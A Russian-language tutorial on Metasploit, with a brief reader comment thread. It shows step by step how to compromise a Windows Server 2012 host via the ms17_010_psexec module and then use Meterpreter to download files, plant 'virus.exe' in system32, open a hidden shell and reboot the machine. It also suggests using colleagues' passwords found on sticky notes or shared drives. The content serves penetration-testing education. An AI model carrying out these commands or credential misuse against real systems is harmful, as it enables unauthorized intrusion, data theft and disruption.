Metasploit Framework: краткое практическое руководство
Дисклеймер:
Автор материала не несет ответственности, за действия совершенные читателями. Информация предоставлена исключительно в ознакомительных целях.
Metasploit представляет собой платформу для тестирования на проникновение, позволяет имитировать сетевые атаки, а также является средством создания и применения эксплойтов. На данный момент Metasploit приобретен компанией Rapid7 и имеет несколько версий:
— командная оболочка msfconole
— версия с web-интерфейсом Metasploit PRO.
Загрузить и установить Metasploit можно с официального сайта проекта:
https://metasploit.com/
Или Gitlab:
https://gitlab.com/kalilinux/packages/metasploit-framework
В этой статье я постараюсь полностью избежать теории и максимально коротко раскрыть практическую сторону Metasploit на примере проникновения в ОС Windows Server 2012.
Подготовим все необходимое
В качестве атакующей машины будет выступать компьютер под управлением ОС Kali, дистрибутив которой уже содержит Metasploit, нам остается только запустить сервис базы данных:
$sudo service postgresql start
Убедиться, что база данных прослушивает порт 5432 командой:
$ss -ant
Остается только инициализировать БД msf:
$sudo msfdb init
Теперь можно запускать msfconsole:
$msfconsole
Проверим статус БД:
msf5 >db_status
Если всё настроено верно, то мы получим примерно такой вывод:
[*] Connected to msf. Connection type: postgresql.
Сбор информации и атака
Для этой цели будем использовать сетевой сканнер nmap прямо из консоли msf. Как использовать nmap — это отдельная тема, останавливаться на ней сейчас я не буду, скажу только, что ip-адрес жертвы в этом примере нам известен, а ключ -sV даст больше информации об ОС, службах и открытых портах:
msf5 >nmap -sV 192.168.1.104
Для поиска эксплойтов используем команду search. Также искать эксплойты можно по названию, коду CVE, версии сервиса или на https://www.exploit-db.com/
Следующей командой ищем модули для работы с SMB:
msf5 >search smb
В выводе мы получим список всех известных на данный момент модулей для SMB. А также версию, код уязвимости и шансы на успех.
Выбор осуществляется командой use:
msf5 >use exploit/windows/smb/ms17_010_psexec
Для смены модуля используем команду use или для отмены команду back.
Теперь мы можем установить ip адрес жертвы и ввести команду exploit в msfconsole для выполнения выбранного модуля или просмотреть опции модуля командой show options.
Опции модуля устанавливаются командой set.
В моей компании половина сотрудников хранят свои пароли на стикерах, приклеенных к мониторам. А в компании, где я работал до этого, все логины и пароли лежали на общедоступном диске в одном документе. Поэтому если вам так же «повезло», как мне, используем социальную инженерию и зададим логин и пароль:
msf5 exploit(windows/smb/ms17_010_psexec)>set smbuser Ivanov_II
msf5 exploit(windows/smb/ms17_010_psexec)>set smbpass Qwerty123
Но в данном примере я задам только ip-адрес, в этом случае Metasploit будет пытаться войти в систему либо анонимно, либо используя словарь, адрес которого видно в опциях. Вводим:
msf5 exploit(windows/smb/ms17_010_psexec)>set rhost 192.168.1.104
И запустим выбраный модуль:
msf5 exploit(windows/smb/ms17_010_psexec)>exploit
Если все прошло успешно, то мы попадем в сессию Meterpreter.
Для наглядности протестируем несколько команд:
Попробуем скопировать данные себе на компьютер. Перемещаться по директориям можно стандартными командами Windows.
meterpreter>download info.txt
Скопируем файл на ПК жертвы:
meterpreter> upload virus.exe c:\\windows\\system32
Запустим командную строку:
meterpreter>execute -f cmd.exe -i -H
И отправим сервер на перезагрузку:
meterpreter>reboot
Более подробно о возможностях Metasploit и Meterpreter можно почитать в курсе от Offensive Security:
https://www.offensive-security.com/metasploit-unleashed/
Или в официальной документации:
https://metasploit.help.rapid7.com/docs
Странная статья на vc, на хабре, пожалуйста, но тут мне кажется другое комьюнити
Вполне может быть. Меня сбило с толку слово "технологии" в описании этого ресурса.
Почему? Что тут вообще могло смутить?
Потому что самое страшное, что может случится - это перепутать комьюнити, для которого ты пишешь.
Вам на хабр